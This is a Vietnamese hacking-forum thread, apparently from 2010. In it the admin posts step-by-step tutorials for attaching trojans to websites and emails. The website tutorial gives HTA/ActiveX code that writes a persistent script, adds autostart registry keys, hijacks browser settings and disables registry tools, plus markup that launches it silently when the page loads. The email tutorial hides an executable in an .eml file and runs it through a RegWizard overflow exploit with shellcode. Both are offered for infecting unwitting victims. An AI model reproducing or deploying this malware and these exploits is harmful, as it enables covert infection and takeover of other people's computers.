Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» NewBlueFx TotalFX Windows-FL | 1.11 GB
Tue Dec 17, 2013 12:42 pm by titquarra

» NewBlueFx TotalFX Windows-FL | 1.11 GB
Tue Dec 17, 2013 12:42 pm by titquarra

» Celebrity.Sex.Tape.UNCUT.&.UNRATED.2012.720p.BRrip.x264.YIFY.mp4
Tue Dec 17, 2013 8:32 am by titquarra

» Maya Autodesk Personal Learning Edition 8.5
Tue Dec 17, 2013 7:47 am by titquarra

» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

Shopmotion


Affiliates
free forum


Cách đính kèm trojan vào website

View previous topic View next topic Go down

Cách đính kèm trojan vào website

Post  Admin on Mon Nov 22, 2010 5:43 am


Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

Code:

<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "Địa chỉ trojon";');
a2.WriteLine('var burl = "Địa chỉ trojon";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>

rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:

<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện

Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumotion.com

Back to top Go down

Cách đính Trojan vào Mail

Post  Admin on Mon Nov 22, 2010 5:49 am

"Badblood" la mot cong cu giup ban lam cho victim bi lay nhiem con trojan (cua ban) de dang hon qua con duong email.

Badblood la thuat ngu moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.

Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.

Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi moi bi lay nhiem (:<)

Buoc1:
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (disable) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)

Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.

Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.

Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:

Code:
Content-Disposition: attachment;
filename="file.exe"

- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:

Code:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"

- Sau do vao phan dinh dang attachement ding.wav ta cat dong Content-ID sau:

Code:
Content-ID: <002801bf41c9$95325940$0100007f@computername>

- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:

Code:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.

- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:

Code:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >

expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"

expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"

RegWizObj.InvokeRegWizard(expstr)
</script>

- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.

Neu cac ban thay rac roi thi hay gui email den cho toi, toi se send cho cac ban cai source code cua Badblood, ban chi can them email cua nan nhan, subject va dinh kem file la hoan thanh cong viec.

Luc dau toi thay lam the nay rat rac roi, nhung khi thuc hanh khoang 2 ,3 lan la thanh thao ngay.

Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumotion.com

Back to top Go down

Re: Cách đính kèm trojan vào website

Post  graycap on Mon Nov 22, 2010 7:53 pm

anh admin có thể cho em xin cái YH để trao đổi được không ..???
em có một số câu hỏi cần anh giúp...???? lol!

graycap

Tổng số bài gửi : 3
Join date : 2010-11-19

View user profile

Back to top Go down

Re: Cách đính kèm trojan vào website

Post  Sponsored content Today at 3:35 am


Sponsored content


Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum